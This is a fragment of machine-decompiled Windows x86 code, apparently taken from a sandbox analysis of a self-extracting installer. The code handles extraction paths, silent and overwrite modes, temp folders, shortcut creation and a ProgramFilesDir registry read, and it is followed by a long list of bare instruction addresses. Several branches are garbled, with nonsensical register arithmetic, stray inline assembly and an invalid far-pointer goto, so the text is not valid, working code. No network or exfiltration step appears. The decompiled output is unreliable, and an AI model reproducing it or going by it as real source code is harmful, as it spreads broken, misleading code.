										_t271 = _t271 + 0x14;
										_t219 = GetFileAttributesW(_t269 - 0x103c);
										__eflags = _t219 - 0xffffffff;
										if(_t219 != 0xffffffff) {
											_t267 = _t267 + 1;
											__eflags = _t267;
											_push(_t267);
											goto L24;
										} else {
											_t222 = MoveFileW(_t269 - 0x3c84, _t269 - 0x103c);
											__eflags = _t222;
											if(_t222 != 0) {
												MoveFileExW(_t269 - 0x103c, _t260, 4);
											}
											goto L27;
										}
									}
								}
							case 1:
								__eflags = __ebx;
								if(__ebx == 0) {
									__eax =  *0xa3ce0c;
									__eflags =  *0xa3ce0c;
									__ebx = __ebx & 0xffffff00 |  *0xa3ce0c == 0x00000000;
									__eflags = __bl;
									if(__bl == 0) {
										__eax =  *0xa3ce0c;
										_pop(__ecx);
										_pop(__ecx);
									}
									__bh =  *((intOrPtr*)(__ebp - 0xd));
									__eflags = __bh;
									if(__eflags == 0) {
										__eax = __ebp + 0xc;
										_push(__ebp + 0xc);
										__esi = E009FA2AE(__ecx, __edx, __eflags);
										__eax =  *0xa3ce0c;
									} else {
										__esi = __ebp - 0x5c84;
									}
									__eflags = __bl;
									if(__bl == 0) {
										__edi = __eax;
									}
									__eax = E00A02B33(__esi);
									__eax = __eax + __edi;
									_push(__eax);
									_push( *0xa3ce0c);
									__eax = E00A02B5E(__ecx, __edx);
									__esp = __esp + 0xc;
									__eflags = __eax;
									if(__eax != 0) {
										 *0xa3ce0c = __eax;
										__eflags = __bl;
										if(__bl != 0) {
											__ecx = 0;
											__eflags = 0;
											 *__eax = __cx;
										}
										__eax = E00A066ED(__eax, __esi);
										_pop(__ecx);
										_pop(__ecx);
									}
									__eflags = __bh;
									if(__bh == 0) {
										__eax = L00A02B4E(__esi);
									}
								}
								goto L159;
							case 2:
								__eflags = __ebx;
								if(__ebx == 0) {
									__ebp - 0x5c84 = SetWindowTextW( *(__ebp + 8), __ebp - 0x5c84);
								}
								goto L159;
							case 3:
								__eflags = __ebx;
								if(__ebx != 0) {
									goto L159;
								}
								__eflags =  *0xa29602 - __di;
								if( *0xa29602 != __di) {
									goto L159;
								}
								__eax = 0;
								__edi = __ebp - 0x5c84;
								_push(0x22);
								 *(__ebp - 0x103c) = __ax;
								_pop(__eax);
								__eflags =  *(__ebp - 0x5c84) - __ax;
								if( *(__ebp - 0x5c84) == __ax) {
									__edi = __ebp - 0x5c82;
								}
								__eax = E00A02B33(__edi);
								__esi = 0x800;
								__eflags = __eax - 0x800;
								if(__eax >= 0x800) {
									goto L159;
								} else {
									__eax =  *__edi & 0x0000ffff;
									_push(0x5c);
									_pop(__ecx);
									__eflags = ( *__edi & 0x0000ffff) - 0x2e;
									if(( *__edi & 0x0000ffff) != 0x2e) {
										L54:
										__eflags = __ax - __cx;
										if(__ax == __cx) {
											L66:
											__ebp - 0x103c = E009EFAB1(__ebp - 0x103c, __edi, __esi);
											__ebx = 0;
											__eflags = 0;
											L67:
											_push(0x22);
											_pop(__eax);
											__eax = __ebp - 0x103c;
											__eax = E00A00D9B(__ebp - 0x103c, __ebp - 0x103c);
											_pop(__ecx);
											_pop(__ecx);
											__eflags = __eax;
											if(__eax != 0) {
												__eflags =  *((intOrPtr*)(__eax + 2)) - __bx;
												if( *((intOrPtr*)(__eax + 2)) == __bx) {
													__ecx = 0;
													__eflags = 0;
													 *__eax = __cx;
												}
											}
											__eax = __ebp - 0x103c;
											__edi = 0xa29602;
											E009EFAB1(0xa29602, __ebp - 0x103c, __esi) = __ebp - 0x103c;
											__eax = E009F9FFC(__ebp - 0x103c, __esi);
											__esi = GetDlgItem( *(__ebp + 8), 0x66);
											__ebp - 0x103c = SetWindowTextW(__esi, __ebp - 0x103c); // executed
											__ebx =  *0xa1df7c;
											__eax = SendMessageW(__esi, 0x143, __ebx, 0xa29602); // executed
											__eax = __ebp - 0x103c;
											__eax = E00A02B69(__ebp - 0x103c, 0xa29602, __eax);
											_pop(__ecx);
											_pop(__ecx);
											__eflags = __eax;
											if(__eax != 0) {
												__ebp - 0x103c = 0;
												__eax = SendMessageW(__esi, 0x143, 0, __ebp - 0x103c);
											}
											goto L159;
										}
										__eflags = __ax;
										if(__ax == 0) {
											L57:
											__eax = __ebp - 0x18;
											__ebx = 0;
											_push(__ebp - 0x18);
											_push(1);
											_push(0);
											_push(L"Software\\Microsoft\\Windows\\CurrentVersion");
											_push(0x80000002);
											__eax =  *0xa1dea8();
											__eflags = __eax;
											if(__eax == 0) {
												__eax = __ebp - 0x14;
												 *(__ebp - 0x14) = 0x1000;
												_push(__ebp - 0x14);
												__eax = __ebp - 0x103c;
												_push(__ebp - 0x103c);
												__eax = __ebp - 0x1c;
												_push(__ebp - 0x1c);
												_push(0);
												_push(L"ProgramFilesDir");
												_push( *(__ebp - 0x18));
												__eax =  *0xa1dea4();
												_push( *(__ebp - 0x18));
												 *0xa1de84() =  *(__ebp - 0x14);
												__ecx = 0x7ff;
												__eax =  *(__ebp - 0x14) >> 1;
												__eflags = __eax - 0x7ff;
												if(__eax >= 0x7ff) {
													__eax = 0x7ff;
												}
												__ecx = 0;
												__eflags = 0;
												 *(__ebp + __eax * 2 - 0x103c) = __cx;
											}
											__eflags =  *(__ebp - 0x103c) - __bx;
											if( *(__ebp - 0x103c) != __bx) {
												__eax = __ebp - 0x103c;
												__eax = E00A02B33(__ebp - 0x103c);
												_push(0x5c);
												_pop(__ecx);
												__eflags =  *((intOrPtr*)(__ebp + __eax * 2 - 0x103e)) - __cx;
												if(__eflags != 0) {
													__ebp - 0x103c = E009EFA89(__eflags, __ebp - 0x103c, "\\", __esi);
												}
											}
											__esi = E00A02B33(__edi);
											__eax = __ebp - 0x103c;
											__eflags = __esi - 0x7ff;
											__esi = 0x800;
											if(__eflags < 0) {
												__ebp - 0x103c = E009EFA89(__eflags, __ebp - 0x103c, __edi, 0x800);
											}
											goto L67;
										}
										__eflags =  *((short*)(__edi + 2)) - 0x3a;
										if( *((short*)(__edi + 2)) == 0x3a) {
											goto L66;
										}
										goto L57;
									}
									__eflags =  *((intOrPtr*)(__edi + 2)) - __cx;
									if( *((intOrPtr*)(__edi + 2)) != __cx) {
										goto L54;
									}
									__edi = __edi + 4;
									__ebx = 0;
									__eflags =  *__edi - __bx;
									if( *__edi == __bx) {
										goto L159;
									} else {
										__ebp - 0x103c = E009EFAB1(__ebp - 0x103c, __edi, 0x800);
										goto L67;
									}
								}
							case 4:
								__eflags =  *0xa295fc - 1;
								__eflags = __eax - 0xa295fc;
								 *__edi =  *__edi + __ecx;
								__eflags =  *(__ebx + 6) & __bl;
								 *__eax =  *__eax + __al;
								__eflags =  *__eax;
							case 5:
								__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
								__ecx = 0;
								__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
								__eflags = __eax;
								if(__eax == 0) {
									L84:
									 *0xa275d2 = __cl;
									 *0xa275d3 = 1;
									goto L159;
								}
								__eax = __eax - 0x30;
								__eflags = __eax;
								if(__eax == 0) {
									 *0xa275d2 = __cl;
									L83:
									 *0xa275d3 = __cl;
									goto L159;
								}
								__eax = __eax - 1;
								__eflags = __eax;
								if(__eax == 0) {
									goto L84;
								}
								__eax = __eax - 1;
								__eflags = __eax;
								if(__eax != 0) {
									goto L159;
								}
								 *0xa275d2 = 1;
								goto L83;
							case 6:
								__eflags = __ebx - 4;
								if(__ebx != 4) {
									goto L94;
								}
								__eax = __ebp - 0x5c84;
								__eax = E00A02B69(__ebp - 0x5c84, __eax, L"<>");
								_pop(__ecx);
								_pop(__ecx);
								__eflags = __eax;
								if(__eax == 0) {
									goto L94;
								}
								_push(__edi);
								goto L93;
							case 7:
								__eflags = __ebx - 1;
								if(__eflags != 0) {
									__eflags = __ebx - 7;
									if(__ebx == 7) {
										__eflags =  *0xa295fc;
										if( *0xa295fc == 0) {
											 *0xa295fc = 2;
											asm("cld");
											_t123 = __eax;
											__eax = __ebp;
											__ebp = _t123;
											 *0x200 = __al;
											__dh = __dh + __al;
											__eflags = __dh;
										}
										 *0xa285f8 = 1;
									}
									goto L159;
								}
								__eax = __ebp - 0x7c84;
								__edi = 0x800;
								GetTempPathW(0x800, __ebp - 0x7c84) = __ebp - 0x7c84;
								E009EAEA5(__eflags, __ebp - 0x7c84, 0x800) = 0;
								__esi = 0;
								_push(0);
								while(1) {
									_push( *0xa1d5f8);
									__ebp - 0x7c84 = E009E3E41(0xa285fa, __edi, L"%s%s%u", __ebp - 0x7c84);
									__eax = E009E9E6B(0xa285fa);
									__eflags = __al;
									if(__al == 0) {
										break;
									}
									__esi =  &(__esi->i);
									__eflags = __esi;
									_push(__esi);
								}
								_push(0xa285fa);
								_push(0x66);
								_push( *(__ebp + 8));
								__eax =  *0xa1dfcc();
								__eflags =  *(__ebp - 0x5c84);
								if( *(__ebp - 0x5c84) == 0) {
									goto L159;
								}
								__eflags =  *0xa35d02;
								if( *0xa35d02 != 0) {
									goto L159;
								}
								__eax = 0;
								__eflags = 0;
								 *(__ebp - 0x143c) = __ax;
								 *((intOrPtr*)(__ebp - 0x5c837b)) =  *((intOrPtr*)(__ebp - 0x5c837b)) - 1;
								goto [far dword [edx+0x2c];
							case 8:
								__eflags = __ebx - 3;
								if(__ebx == 3) {
									__eflags =  *(__ebp - 0x5c84) - __di;
									if(__eflags != 0) {
										__eax = __ebp - 0x5c84;
										_push(__ebp - 0x5c84);
										__eax = E00A0668C(__ebx, __edi);
										_pop(__ecx);
										 *0xa3de1c = __eax;
									}
									__eax = __ebp + 0xc;
									_push(__ebp + 0xc);
									 *0xa3de18 = E009FA2AE(__ecx, __edx, __eflags);
								}
								 *0xa35d03 = 1;
								goto L159;
							case 9:
								__eflags = __ebx - 5;
								if(__ebx != 5) {
									L94:
									 *0xa3de20 = 1;
									goto L159;
								}
								_push(1);
								L93:
								__eax = __ebp - 0x5c84;
								_push(__ebp - 0x5c84);
								_push( *(__ebp + 8));
								__eax = E009FC431();
								goto L94;
							case 0xa:
								__eflags = __ebx - 6;
								if(__ebx != 6) {
									goto L159;
								}
								__eax = 0;
								 *(__ebp - 0x2c3c) = __ax;
								__eax =  *(__ebp - 0x1bc8c) & 0x0000ffff;
								__eax = E00A059C0( *(__ebp - 0x1bc8c) & 0x0000ffff);
								_push(0x800);
								__eflags = __eax - 0x50;
								if(__eax == 0x50) {
									_push(0xa3ad0a);
									__eax = __ebp - 0x2c3c;
									_push(__ebp - 0x2c3c);
									__eax = E009EFAB1();
									 *(__ebp - 0x14) = 2;
								} else {
									__eflags = __eax - 0x54;
									__eax = __ebp - 0x2c3c;
									if(__eflags == 0) {
										_push(0xa39d0a);
										_push(__eax);
										__eax = E009EFAB1();
										 *(__ebp - 0x14) = 7;
									} else {
										_push(0xa3bd0a);
										_push(__eax);
										__eax = E009EFAB1();
										 *(__ebp - 0x14) = 0x10;
									}
								}
								__eax = 0;
								 *(__ebp - 0x9c8c) = __ax;
								 *(__ebp - 0x1c3c) = __ax;
								__ebp - 0x19c8c = __ebp - 0x6c84;
								__eax = E00A04D7E(__ebp - 0x6c84, __ebp - 0x19c8c);
								_pop(__ecx);
								_pop(__ecx);
								_push(0x22);
								_pop(__ebx);
								__eflags =  *(__ebp - 0x6c84) - __bx;
								if( *(__ebp - 0x6c84) != __bx) {
									__ebp - 0x6c84 = E009E9E6B(__ebp - 0x6c84);
									__eflags = __al;
									if(__al != 0) {
										goto L144;
									}
									__ebx = __edi;
									__esi = __ebp - 0x6c84;
									__eflags =  *(__ebp - 0x6c84) - __bx;
									if( *(__ebp - 0x6c84) == __bx) {
										goto L144;
									}
									_push(0x20);
									_pop(__ecx);
									do {
										__eax = __esi->i & 0x0000ffff;
										__eflags = __ax - __cx;
										if(__ax == __cx) {
											L132:
											__edi = __eax;
											__eax = 0;
											__esi->i = __ax;
											__ebp - 0x6c84 = E009E9E6B(__ebp - 0x6c84);
											__eflags = __al;
											if(__al == 0) {
												__esi->i = __di;
												L140:
												_push(0x20);
												_pop(__ecx);
												__edi = 0;
												__eflags = 0;
												goto L141;
											}
											_push(0x2f);
											_pop(__eax);
											__ebx = __esi;
											__eflags = __di - __ax;
											if(__di != __ax) {
												_push(0x20);
												_pop(__eax);
												do {
													__esi =  &(__esi->i);
													__eflags = __esi->i - __ax;
												} while (__esi->i == __ax);
												_push(__esi);
												__eax = __ebp - 0x1c3c;
												L138:
												_push(__eax);
												__eax = E00A04D7E();
												_pop(__ecx);
												_pop(__ecx);
												 *__ebx = __di;
												goto L140;
											}
											 *(__ebp - 0x1c3c) = __ax;
											__eax =  &(__esi->i);
											_push( &(__esi->i));
											__eax = __ebp - 0x1c3a;
											goto L138;
										}
										_push(0x2f);
										_pop(__edx);
										__eflags = __ax - __dx;
										if(__ax != __dx) {
											goto L141;
										}
										goto L132;
										L141:
										__esi =  &(__esi->i);
										__eflags = __esi->i - __di;
									} while (__esi->i != __di);
									__eflags = __ebx;
									if(__ebx != 0) {
										__eax = 0;
										__eflags = 0;
										 *__ebx = __ax;
									}
									goto L144;
								} else {
									__ebp - 0x19c8a = __ebp - 0x6c84;
									E00A04D7E(__ebp - 0x6c84, __ebp - 0x19c8a) = __ebp - 0x6c82;
									_push(__ebx);
									_push(__ebp - 0x6c82);
									__eax = E00A00BB8(__ecx);
									__esp = __esp + 0x10;
									__eflags = __eax;
									if(__eax != 0) {
										__ecx = 0;
										 *__eax = __cx;
										__ebp - 0x1c3c = E00A04D7E(__ebp - 0x1c3c, __ebp - 0x1c3c);
										_pop(__ecx);
										_pop(__ecx);
									}
									L144:
									__eflags =  *(__ebp - 0x11c8c);
									__ebx = 0x800;
									if( *(__ebp - 0x11c8c) != 0) {
										_push(0x800);
										__eax = __ebp - 0x9c8c;
										_push(__ebp - 0x9c8c);
										__eax = __ebp - 0x11c8c;
										_push(__ebp - 0x11c8c);
										__eax = E009EAED7();
									}
									_push(__ebx);
									__eax = __ebp - 0xbc8c;
									_push(__ebp - 0xbc8c);
									__eax = __ebp - 0x6c84;
									_push(__ebp - 0x6c84);
									__eax = E009EAED7();
									__eflags =  *(__ebp - 0x2c3c);
									if(__eflags == 0) {
										__ebp - 0x2c3c = E009FA24E(__ecx, __ebp - 0x2c3c,  *(__ebp - 0x14));
									}
									__ebp - 0x2c3c = E009EAEA5(__eflags, __ebp - 0x2c3c, __ebx);
									__eflags =  *((short*)(__ebp - 0x17c8c));
									if(__eflags != 0) {
										__ebp - 0x17c8c = __ebp - 0x2c3c;
										E009EFA89(__eflags, __ebp - 0x2c3c, __ebp - 0x17c8c, __ebx) = __ebp - 0x2c3c;
										__eax = E009EAEA5(__eflags, __ebp - 0x2c3c, __ebx);
									}
									__ebp - 0x2c3c = __ebp - 0xcc8c;
									__eax = E00A04D7E(__ebp - 0xcc8c, __ebp - 0x2c3c);
									__eflags =  *(__ebp - 0x13c8c);
									__eax = __ebp - 0x13c8c;
									_pop(__ecx);
									_pop(__ecx);
									if(__eflags == 0) {
										__eax = __ebp - 0x19c8c;
									}
									__ebp - 0x2c3c = E009EFA89(__eflags, __ebp - 0x2c3c, __ebp - 0x2c3c, __ebx);
									__eax = __ebp - 0x2c3c;
									__eflags = E009EB153(__ebp - 0x2c3c);
									if(__eflags == 0) {
										__ebp - 0x2c3c = E009EFA89(__eflags, __ebp - 0x2c3c, L".lnk", __ebx);
										_push(1);
									} else {
										__eflags = __eax;
										if (__eflags == 0) goto L156;
										asm("adc dl, [ebx+0x68]");
									}
								}
							case 0xb:
								__eflags = __ebx - 7;
								if(__ebx == 7) {
									 *0xa29600 = 1;
								}
								goto L159;
							case 0xc:
								__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
								__eax = E00A059C0( *(__ebp - 0x5c84) & 0x0000ffff);
								__eflags = __eax - 0x46;
								if(__eax == 0x46) {
									 *0xa275d4 = 1;
								} else {
									__eflags = __eax - 0x55;
									if(__eax == 0x55) {
										 *0xa275d5 = 1;
									} else {
										__eax = 0;
										 *0xa275d4 = __al;
										 *0xa275d5 = __al;
									}
								}
								goto L159;
							case 0xd:
								 *0xa3de21 = 1;
								__eax = __eax + 0xa3de21;
								_t112 = __esi + 0x39;
								 *_t112 =  *(__esi + 0x39) + __esp;
								__eflags =  *_t112;
								__ebp = 0xffffa37c;
								if( *_t112 != 0) {
									_t114 = __ebp - 0x5c84; // 0xffff46f8
									__eax = _t114;
									_push(_t114);
									 *0xa1d5fc = E009F13FC();
								}
								goto L159;
						}
						L4:
						_t187 = E009F9E24(_t187, _t263);
						_t263 = _t263 + 0x2000;
						_t260 = _t260 - 1;
						if(_t260 != 0) {
							goto L4;
						} else {
							_t264 = _t260;
							goto L6;
						}
						L159:
						_push(0x1000);
						_t172 = _t269 - 0xe; // 0xffffa36e
						_t173 = _t269 - 0xd; // 0xffffa36f
						_t174 = _t269 - 0x5c84; // 0xffff46f8
						_t175 = _t269 - 0xfc8c; // 0xfffea6f0
						_push( *((intOrPtr*)(_t269 + 0xc)));
						_t182 = E009FA156();
						_t245 =  *((intOrPtr*)(_t269 + 0x10));
						 *((intOrPtr*)(_t269 + 0xc)) = _t182;
					} while (_t182 != 0);
				}
			}











                            0x009fb4c7
                            0x009fb4cc
                            0x009fb4d1
                            0x009fb4d6
                            0x009fb4df
                            0x009fc0c7
                            0x009fc0ca
                            0x009fc0d4
                            0x009fc0d4
                            0x009fb4e5
                            0x009fb4ed
                            0x009fb4f1
                            0x009fb4f8
                            0x009fb4ff
                            0x009fb500
                            0x009fb503
                            0x009fb50a
                            0x009fb50f
                            0x009fb516
                            0x009fb51b
                            0x009fb51d
                            0x009fb523
                            0x009fb529
                            0x009fb529
                            0x00000000
                            0x009fb53e
                            0x009fb555
                            0x009fb559
                            0x00000000
                            0x009fb55b
                            0x00000000
                            0x009fb55b
                            0x009fb559
                            0x009fb563
                            0x00000000
                            0x00000000
                            0x009fb569
                            0x00000000
                            0x009fb570
                            0x009fb573
                            0x00000000
                            0x00000000
                            0x009fb579
                            0x009fb586
                            0x009fb5ac
                            0x009fb5b7
                            0x009fb5c1
                            0x009fb5cc
                            0x009fb5d1
                            0x009fb5d9
                            0x009fb5df
                            0x009fb5e4
                            0x009fb5e6
                            0x009fb74b
                            0x009fb74b
                            0x009fb755
                            0x00000000
                            0x009fb5ec
                            0x009fb5f2
                            0x009fb614
                            0x009fb623
                            0x009fb630
                            0x009fb641
                            0x009fb644
                            0x009fb647
                            0x009fb65a
                            0x009fb661
                            0x009fb666
                            0x009fb668
                            0x00000000
                            0x00000000
                            0x009fb66e
                            0x009fb675
                            0x009fb67a
                            0x009fb67f
                            0x009fb68b
                            0x009fb690
                            0x009fb693
                            0x009fb69a
                            0x009fb69c
                            0x009fb69d
                            0x009fb6a7
                            0x009fb6ad
                            0x009fb6ae
                            0x00000000
                            0x009fb6ae
                            0x009fb650
                            0x009fb656
                            0x009fb658
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009fb6b4
                            0x009fb6bb
                            0x009fb6bd
                            0x009fb6c0
                            0x009fb730
                            0x009fb730
                            0x009fb738
                            0x009fb73e
                            0x009fb743
                            0x009fb745
                            0x009fb5f4
                            0x009fb5f9
                            0x009fb601
                            0x009fb607
                            0x009fb60e
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009fb60e
                            0x00000000
                            0x009fb745
                            0x009fb6c9
                            0x009fb6cf
                            0x009fb6d1
                            0x00000000
                            0x009fb6d3
                            0x009fb6d3
                            0x009fb6d5
                            0x009fb6d6
                            0x009fb6da
                            0x009fb6f2
                            0x009fb6f7
                            0x009fb701
                            0x009fb703
                            0x009fb706
                            0x009fb6d8
                            0x009fb6d8
                            0x009fb6d9
                            0x00000000
                            0x009fb708
                            0x009fb716
                            0x009fb71c
                            0x009fb71e
                            0x009fb72a
                            0x009fb72a
                            0x00000000
                            0x009fb71e
                            0x009fb706
                            0x009fb6d1
                            0x00000000
                            0x009fb75f
                            0x009fb761
                            0x009fb767
                            0x009fb76c
                            0x009fb76e
                            0x009fb771
                            0x009fb773
                            0x009fb780
                            0x009fb785
                            0x009fb786
                            0x009fb786
                            0x009fb787
                            0x009fb78a
                            0x009fb78c
                            0x009fb796
                            0x009fb799
                            0x009fb79f
                            0x009fb7a1
                            0x009fb78e
                            0x009fb78e
                            0x009fb78e
                            0x009fb7a6
                            0x009fb7a8
                            0x009fb7b1
                            0x009fb7b1
                            0x009fb7b4
                            0x009fb7b9
                            0x009fb7c2
                            0x009fb7c3
                            0x009fb7c9
                            0x009fb7ce
                            0x009fb7d1
                            0x009fb7d3
                            0x009fb7d5
                            0x009fb7da
                            0x009fb7dc
                            0x009fb7de
                            0x009fb7de
                            0x009fb7e0
                            0x009fb7e0
                            0x009fb7e5
                            0x009fb7ea
                            0x009fb7eb
                            0x009fb7eb
                            0x009fb7ec
                            0x009fb7ee
                            0x009fb7f5
                            0x009fb7fa
                            0x009fb7ee
                            0x00000000
                            0x00000000
                            0x009fb800
                            0x009fb802
                            0x009fb812
                            0x009fb812
                            0x00000000
                            0x00000000
                            0x009fb81d
                            0x009fb81f
                            0x00000000
                            0x00000000
                            0x009fb825
                            0x009fb82c
                            0x00000000
                            0x00000000
                            0x009fb832
                            0x009fb834
                            0x009fb83a
                            0x009fb83c
                            0x009fb843
                            0x009fb844
                            0x009fb84b
                            0x009fb84d
                            0x009fb84d
                            0x009fb854
                            0x009fb859
                            0x009fb85f
                            0x009fb861
                            0x00000000
                            0x009fb867
                            0x009fb867
                            0x009fb86a
                            0x009fb86c
                            0x009fb86d
                            0x009fb870
                            0x009fb899
                            0x009fb899
                            0x009fb89c
                            0x009fb981
                            0x009fb98a
                            0x009fb98f
                            0x009fb98f
                            0x009fb991
                            0x009fb991
                            0x009fb993
                            0x009fb995
                            0x009fb99c
                            0x009fb9a1
                            0x009fb9a2
                            0x009fb9a3
                            0x009fb9a5
                            0x009fb9a7
                            0x009fb9ab
                            0x009fb9ad
                            0x009fb9ad
                            0x009fb9af
                            0x009fb9af
                            0x009fb9ab
                            0x009fb9b3
                            0x009fb9b9
                            0x009fb9c6
                            0x009fb9cd
                            0x009fb9dd
                            0x009fb9e7
                            0x009fb9ef
                            0x009fb9fb
                            0x009fb9fd
                            0x009fba05
                            0x009fba0a
                            0x009fba0b
                            0x009fba0c
                            0x009fba0e
                            0x009fba1b
                            0x009fba24
                            0x009fba24
                            0x00000000
                            0x009fba0e
                            0x009fb8a2
                            0x009fb8a5
                            0x009fb8b2
                            0x009fb8b2
                            0x009fb8b5
                            0x009fb8b7
                            0x009fb8b8
                            0x009fb8ba
                            0x009fb8bb
                            0x009fb8c0
                            0x009fb8c5
                            0x009fb8cb
                            0x009fb8cd
                            0x009fb8cf
                            0x009fb8d2
                            0x009fb8d9
                            0x009fb8da
                            0x009fb8e0
                            0x009fb8e1
                            0x009fb8e4
                            0x009fb8e5
                            0x009fb8e6
                            0x009fb8eb
                            0x009fb8ee
                            0x009fb8f4
                            0x009fb8fd
                            0x009fb900
                            0x009fb905
                            0x009fb907
                            0x009fb909
                            0x009fb90b
                            0x009fb90b
                            0x009fb90d
                            0x009fb90d
                            0x009fb90f
                            0x009fb90f
                            0x009fb917
                            0x009fb91e
                            0x009fb920
                            0x009fb927
                            0x009fb92d
                            0x009fb92f
                            0x009fb930
                            0x009fb938
                            0x009fb947
                            0x009fb947
                            0x009fb938
                            0x009fb952
                            0x009fb954
                            0x009fb963
                            0x009fb969
                            0x009fb96f
                            0x009fb97a
                            0x009fb97a
                            0x00000000
                            0x009fb96f
                            0x009fb8a7
                            0x009fb8ac
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009fb8ac
                            0x009fb872
                            0x009fb876
                            0x00000000
                            0x00000000
                            0x009fb878
                            0x009fb87b
                            0x009fb87d
                            0x009fb880
                            0x00000000
                            0x009fb886
                            0x009fb88f
                            0x00000000
                            0x009fb88f
                            0x009fb880
                            0x00000000
                            0x009fba2b
                            0x009fba2c
                            0x009fba31
                            0x009fba33
                            0x009fba36
                            0x009fba36
                            0x00000000
                            0x009fba6c
                            0x009fba73
                            0x009fba75
                            0x009fba75
                            0x009fba77
                            0x009fbaa6
                            0x009fbaa6
                            0x009fbaac
                            0x00000000
                            0x009fbaac
                            0x009fba79
                            0x009fba79
                            0x009fba7c
                            0x009fba95
                            0x009fba9b
                            0x009fba9b
                            0x00000000
                            0x009fba9b
                            0x009fba7e
                            0x009fba7e
                            0x009fba81
                            0x00000000
                            0x00000000
                            0x009fba83
                            0x009fba83
                            0x009fba86
                            0x00000000
                            0x00000000
                            0x009fba8c
                            0x00000000
                            0x00000000
                            0x009fbaf9
                            0x009fbafc
                            0x00000000
                            0x00000000
                            0x009fbafe
                            0x009fbb0a
                            0x009fbb0f
                            0x009fbb10
                            0x009fbb11
                            0x009fbb13
                            0x00000000
                            0x00000000
                            0x009fbb15
                            0x00000000
                            0x00000000
                            0x009fbb5b
                            0x009fbb5e
                            0x009fbcdf
                            0x009fbce2
                            0x009fbce8
                            0x009fbcef
                            0x009fbcf1
                            0x009fbcf3
                            0x009fbcf4
                            0x009fbcf4
                            0x009fbcf4
                            0x009fbcf5
                            0x009fbcfa
                            0x009fbcfa
                            0x009fbcfa
                            0x009fbcfb
                            0x009fbcfb
                            0x00000000
                            0x009fbce2
                            0x009fbb64
                            0x009fbb6a
                            0x009fbb78
                            0x009fbb84
                            0x009fbb86
                            0x009fbb88
                            0x009fbb8d
                            0x009fbb8d
                            0x009fbba5
                            0x009fbbb2
                            0x009fbbb7
                            0x009fbbb9
                            0x00000000
                            0x00000000
                            0x009fbb8b
                            0x009fbb8b
                            0x009fbb8c
                            0x009fbb8c
                            0x009fbbbb
                            0x009fbbc0
                            0x009fbbc2
                            0x009fbbc5
                            0x009fbbcb
                            0x009fbbd3
                            0x00000000
                            0x00000000
                            0x009fbbd9
                            0x009fbbe0
                            0x00000000
                            0x00000000
                            0x009fbbe6
                            0x009fbbe6
                            0x009fbbe8
                            0x009fbbee
                            0x009fbbf4
                            0x00000000
                            0x009fbd07
                            0x009fbd0a
                            0x009fbd0c
                            0x009fbd13
                            0x009fbd15
                            0x009fbd1b
                            0x009fbd1c
                            0x009fbd21
                            0x009fbd22
                            0x009fbd22
                            0x009fbd27
                            0x009fbd2a
                            0x009fbd30
                            0x009fbd30
                            0x009fbd35
                            0x00000000
                            0x00000000
                            0x009fbd41
                            0x009fbd44
                            0x009fbb25
                            0x009fbb25
                            0x00000000
                            0x009fbb25
                            0x009fbd4a
                            0x009fbb16
                            0x009fbb16
                            0x009fbb1c
                            0x009fbb1d
                            0x009fbb20
                            0x00000000
                            0x00000000
                            0x009fbd51
                            0x009fbd54
                            0x00000000
                            0x00000000
                            0x009fbd5a
                            0x009fbd5c
                            0x009fbd63
                            0x009fbd6b
                            0x009fbd71
                            0x009fbd76
                            0x009fbd79
                            0x009fbdae
                            0x009fbdb3
                            0x009fbdb9
                            0x009fbdba
                            0x009fbdbf
                            0x009fbd7b
                            0x009fbd7b
                            0x009fbd7e
                            0x009fbd84
                            0x009fbd9a
                            0x009fbd9f
                            0x009fbda0
                            0x009fbda5
                            0x009fbd86
                            0x009fbd86
                            0x009fbd8b
                            0x009fbd8c
                            0x009fbd91
                            0x009fbd91
                            0x009fbd84
                            0x009fbdc6
                            0x009fbdc8
                            0x009fbdcf
                            0x009fbddd
                            0x009fbde4
                            0x009fbde9
                            0x009fbdea
                            0x009fbdeb
                            0x009fbded
                            0x009fbdee
                            0x009fbdf5
                            0x009fbe45
                            0x009fbe4a
                            0x009fbe4c
                            0x00000000
                            0x00000000
                            0x009fbe52
                            0x009fbe54
                            0x009fbe5a
                            0x009fbe61
                            0x00000000
                            0x00000000
                            0x009fbe63
                            0x009fbe65
                            0x009fbe66
                            0x009fbe66
                            0x009fbe69
                            0x009fbe6c
                            0x009fbe76
                            0x009fbe76
                            0x009fbe78
                            0x009fbe7a
                            0x009fbe84
                            0x009fbe89
                            0x009fbe8b
                            0x009fbec9
                            0x009fbecc
                            0x009fbecc
                            0x009fbece
                            0x009fbecf
                            0x009fbecf
                            0x00000000
                            0x009fbecf
                            0x009fbe8d
                            0x009fbe8f
                            0x009fbe90
                            0x009fbe92
                            0x009fbe95
                            0x009fbeaa
                            0x009fbeac
                            0x009fbead
                            0x009fbead
                            0x009fbeb0
                            0x009fbeb0
                            0x009fbeb5
                            0x009fbeb6
                            0x009fbebc
                            0x009fbebc
                            0x009fbebd
                            0x009fbec2
                            0x009fbec3
                            0x009fbec4
                            0x00000000
                            0x009fbec4
                            0x009fbe97
                            0x009fbe9e
                            0x009fbea1
                            0x009fbea2
                            0x00000000
                            0x009fbea2
                            0x009fbe6e
                            0x009fbe70
                            0x009fbe71
                            0x009fbe74
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009fbed1
                            0x009fbed1
                            0x009fbed4
                            0x009fbed4
                            0x009fbed9
                            0x009fbedb
                            0x009fbedd
                            0x009fbedd
                            0x009fbedf
                            0x009fbedf
                            0x00000000
                            0x009fbdf7
                            0x009fbdfe
                            0x009fbe0a
                            0x009fbe10
                            0x009fbe11
                            0x009fbe12
                            0x009fbe17
                            0x009fbe1a
                            0x009fbe1c
                            0x009fbe22
                            0x009fbe24
                            0x009fbe32
                            0x009fbe37
                            0x009fbe38
                            0x009fbe38
                            0x009fbee2
                            0x009fbee2
                            0x009fbeea
                            0x009fbeef
                            0x009fbef1
                            0x009fbef2
                            0x009fbef8
                            0x009fbef9
                            0x009fbeff
                            0x009fbf00
                            0x009fbf00
                            0x009fbf05
                            0x009fbf06
                            0x009fbf0c
                            0x009fbf0d
                            0x009fbf13
                            0x009fbf14
                            0x009fbf19
                            0x009fbf21
                            0x009fbf2d
                            0x009fbf2d
                            0x009fbf3a
                            0x009fbf3f
                            0x009fbf47
                            0x009fbf51
                            0x009fbf5e
                            0x009fbf65
